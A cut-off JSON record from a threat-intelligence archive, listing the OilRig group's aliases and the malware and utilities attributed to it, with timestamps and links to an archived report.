Kitten", "UNC1860", "Yellow Maero" ], "source_name": "ETDA:OilRig", "tools": [ "AMATIAS", "Agent Drable", "Agent Injector", "AgentDrable", "Alma Communicator", "BONDUPDATER", "CACTUSPIPE", "Clayslide", "CypherRat", "DNSExfitrator", "DNSpionage", "DROPSHOT", "DistTrack", "DropperBackdoor", "Fox Panel", "GREYSTUFF", "GoogleDrive RAT", "HighShell", "HyperShell", "ISMAgent", "ISMDoor", "ISMInjector", "Jason", "Karkoff", "LIONTAIL", "LOLBAS", "LOLBins", "LONGWATCH", "LaZagne", "Living off the Land", "MailDropper", "Mimikatz", "MrPerfectInstaller", "OILYFACE", "OopsIE", "POWBAT", "POWRUNER", "Plink", "Poison Frog", "PowerExchange", "PsList", "PuTTY Link", "QUADAGENT", "RDAT", "RGDoor", "SEASHARPEE", "Saitama", "Saitama Backdoor", "Shamoon", "SideTwist", "SpyNote", "SpyNote RAT", "StoneDrill", "TONEDEAF", "TONEDEAF 2.0", "ThreeDollars", "TwoFace", "VALUEVAULT", "Webmask", "WinRAR", "ZEROCLEAR", "ZeroCleare", "certutil", "certutil.exe" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433969, "ts_updated_at": 1775826775, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/9174480b3e9b7e867632197ace06f49012d4dd82.pdf", "text": "https://archive.orkl.eu/9174480b3e9b7e867632197ace06f49012d4dd82.txt", "img": "https://archive.orkl.eu/9174480b3e9b7e867632197ace06f49012d4dd82.jpg" } }